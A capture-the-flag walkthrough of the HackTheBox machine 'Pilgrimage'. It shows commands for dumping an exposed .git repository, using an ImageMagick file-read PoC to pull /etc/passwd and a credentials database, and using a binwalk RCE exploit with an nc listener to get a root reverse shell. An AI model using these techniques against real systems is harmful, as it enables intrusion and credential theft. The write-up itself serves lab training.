Pilgrimage HTB Writeup
Hey Everyone !!
In this writeup we are going to PWN Pilgrimage, an easy machine from HackTheBox
First we need to connect to the HTB VPN and then Join the machine to get the IP address
The IP address of the machine is 10.10.11.219 Next, check the connection to the machine using PING
ping -c 4 10.10.11.219
Enumeration
We are going to start the enumeration with a nmap scan on the target to find out the open ports and the services running on the IP address
nmap -sVC 10.10.11.219Here are the results of the nmap scan:
By the results we find out two exposed services
- SSH on port 22
- HTTP on port 80
We also find a hidden folder called “.git” which likely contains the web project
HTTP Enumeration
We can find the contents of the /.git/ file using a tool git-dumper
Installing git-dumper
git clone https://github.com/arthaud/git-dumper
pip install -r requirements.txtUsing git-dumper
python3 git_dumper.py http://pilgrimage.htb/git/ git
On Listing out the directory we can see the following:
On analyzing the webite we see that it has a function of shrinking image and after it shrinks the image it saves it in /shrunk path
On analyzing the code we see that it is using magick convert command to shrink the image
So, On searching an exploit for magick I found this:
https://github.com/Sybil-Scan/imagemagick-lfi-poc
ImageMagick is vulnerable to “Arbitrary File Read”. This vulnerability allows an attacker to read system files.
git clone https://github.com/Sybil-Scan/imagemagick-lfi-poc.gitUsing the Exploit:
python3 generate.py -f "/etc/passwd" -o exploit.pngThis will generate a png file “exploit.png” which then will allow us to read the arbitrary system files on uploading the png file.
This is the link we get using shrinking:
You can download the file using wget
Now as per the exploit we use-
identify -verbose 64a26fb042e41.png
We get the data in hex form, we can decode it using
As we can see the user is emily, to login into that we will need the password, on analyzing the dashboard.php file we found a sqlite database
Lets try and read this file using the same exploit
python3 generate.py -f "/var/db/pilgrimage" -o exploit2.pngWe get a very large hex, on decoding it we can see
We got the username and the password, Now we can connect to the user emily
We got the Access to the user Emily!!
We can collect the flag from user.txt
Now Let’s go for the root
Using the ps command we find that the root is executing a file named “malwarescan.sh”
The bash script monitors the directory /var/www/pilgrimage.htb/shrunk/ for newly created files and analyzes them for unwanted content using binwalk.
#!/bin/bash
blacklist=("Executable script" "Microsoft executable")
/usr/bin/inotifywait -m -e create t | while read FILE; do
filename="/var/www/pilgrimage.htb/shrunk/$(/usr/bin/echo "$FILE" | /usr/bin/tail -n 1 | /usr/bin/sed -n -e 's/^.*CREATE //p')"
binout="$(/usr/local/bin/binwalk -e "$filename")"
for banned in "${blacklist[@]}"; do
if [[ "$binout" == *"$banned"* ]]; then
/usr/bin/rm "$filename"
break
fi
done
doneThe version of Binwalk found is 2.3.2, So we have to find an exploit for it
On researching on google for a while I found
It is vulnerable to Remote Command Execution
Using the code in the above link create exploit.py
usage: exploit.py [-h] file ip port
Now we get an image binwalk_exploit.png that we have to upload to the same folder where the script is there.
Now we can open a listener using,
nc -lvnp 6969Now to transfer the exploit image to emily we can use http server.
python3 -m http.server PORTUse the above command where the image is present
Now to download it in user emily use:
wget http://[YOUR IP]:PORT/binwalk_exploit.png
Now copy the binwalk_exploit to the /var/www/pilgrimage.htb/shrunk/
after copying you will get a connection to the listener
And Congratulations!!! We are Root
Comments
Post a Comment